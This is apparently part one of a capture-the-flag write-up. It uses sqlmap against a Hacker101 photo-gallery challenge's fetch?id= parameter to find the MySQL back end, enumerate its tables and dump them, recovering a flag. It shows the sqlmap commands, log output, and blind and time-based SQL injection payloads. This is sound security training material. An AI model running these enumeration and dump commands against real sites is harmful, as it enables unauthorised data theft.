Using some tools
We can take a stab at the fact there might be a database powering this web application. Remember in Hacker1 CTF - Micro CMS v2 we performed some sql injection techniques, but this time rather than hand craft the injections, we're going to enlist the help of some tools.
SQLMap
We can use sqlmap to determine things like the likelihood of a vulnerable parameter or path when we supply it a URL, it can determine what DBMS might be powering the applications, and even probe that DBMS for more information.
___
__H__
___ ___[.]_____ ___ ___ {1.3.12#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
After running sqlmap once sqlmap -u http://{ctf}/fetch?id=1 it was able to determine that the application is most likely using MySQL >= 5.0.12 as a DBMS. From there we can also have it begin to enumerate more information about the database and its tables with sqlmap --columns http://{ctf}/fetch?id=1
[20:04:16] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12
[20:04:16] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[20:04:16] [INFO] fetching current database
[20:04:16] [WARNING] running in a single-thread mode. Please consider usage of option '–threads' for faster data retrieval
[20:04:16] [INFO] retrieved: level5
[20:04:50] [INFO] fetching tables for database: 'level5'
[20:04:50] [INFO] fetching number of tables for database 'level5'
[20:04:50] [INFO] retrieved: 2
[20:04:51] [INFO] retrieved: albums
[20:05:06] [INFO] retrieved: photos
[20:05:23] [INFO] fetching columns for table 'photos' in database 'level5'
[20:05:23] [INFO] retrieved: 4
[20:05:25] [INFO] retrieved: id
[20:05:29] [INFO] retrieved: int(11)
[20:05:48] [INFO] retrieved: title
[20:06:03] [INFO] retrieved: text
[20:06:20] [INFO] retrieved: filename
[20:06:45] [INFO] retrieved: text
[20:07:01] [INFO] retrieved: parent
[20:07:52] [INFO] retrieved: int(11)
[20:08:57] [INFO] fetching columns for table 'albums' in database 'level5'
[20:08:57] [INFO] retrieved: 2
[20:08:59] [INFO] retrieved: id
[20:09:06] [INFO] retrieved: int(11)
[20:09:32] [INFO] retrieved: title
[20:09:52] [INFO] retrieved: text
Database: level5
Table: photos
[4 columns]
| Column | Type |
|---|---|
| filename | text |
| id | int(11) |
| parent | int(11) |
| title | text |
Database: level5
Table: albums
[2 columns]
| Column | Type |
|---|---|
| id | int(11) |
| title | text |
Furthermore we can have sqlmap dump the content of those tables with sqlmap --dump -t photos http://{ctf}/fetch?id=1:
[21:45:49][INFO] resuming back-end DBMS 'mysql'
[21:45:49][INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
—
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1341=1341
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 2501 FROM (SELECT(SLEEP(5)))DySl)
—
[21:45:52] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12
[21:45:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:45:52] [INFO] fetching current database
[21:45:52] [INFO] resumed: level5
[21:45:52] [INFO] fetching columns for table 'photos' in database 'level5'
[21:45:52] [INFO] resumed: 4
[21:45:52] [INFO] resumed: id
[21:45:52] [INFO] resumed: title
[21:45:52] [INFO] resumed: filename
[21:45:52] [INFO] resumed: parent
[21:45:52] [INFO] fetching entries for table 'photos' in database 'level5'
[21:45:52] [INFO] fetching number of entries for table 'photos' in database 'level5'
[21:45:52] [WARNING] running in a single-thread mode. Please consider usage of option '–threads' for faster data retrieval
[21:45:52] [INFO] retrieved: 3
[21:46:04] [INFO] retrieved: files/adorable.jpg
[21:47:01] [INFO] retrieved: 1
[21:47:03] [INFO] retrieved: 1
[21:47:05] [INFO] retrieved: Utterly adorable
[21:47:52] [INFO] retrieved: files/purrfect.jpg
[21:48:49] [INFO] retrieved: 2
[21:48:52] [INFO] retrieved: 1
[21:48:54] [INFO] retrieved: Purrfect
[21:49:18] [INFO] retrieved: {flag1}
[21:53:21] [INFO] retrieved: 3
[21:53:26] [INFO] retrieved: 1
[21:53:30] [INFO] retrieved: Invisible
Database: level5
Table: photos
[3 entries]
| id | title | parent | filename |
|---|---|---|---|
| 1 | Utterly adorable | 1 | files/adorable.jpg |
| 2 | Purrfect | 1 | files/purrfect.jpg |
| 3 | Invisible | 1 | {flag1} |
Awesome. Using sqlmap gained us FLAG1 and we learned quite a bit about the database structure/schema of the app.
Let's go ahead and look into the values of the albums table with sqlmap --dump -t albums http://{ctg}/fetch?id=1:
Database: level5
Table: albums
[1 entry]
| id | title |
|---|---|
| 1 | Kittens |
Hmmm, ok I admit I'm stumped here. Using a hint, it mentions something suspicious about calculating the size of an album, which might be referring to the bottom of the page where it says:
Space used: 0 total
How might the page be calculating that number, and why would it come up with a result of 0? Zero what? Bytes? Entries? Either way zero is the wrong answer. Are there other databases besides the one named level5?
Alight well this is already a fairly long post, let's follow up in a Part 2.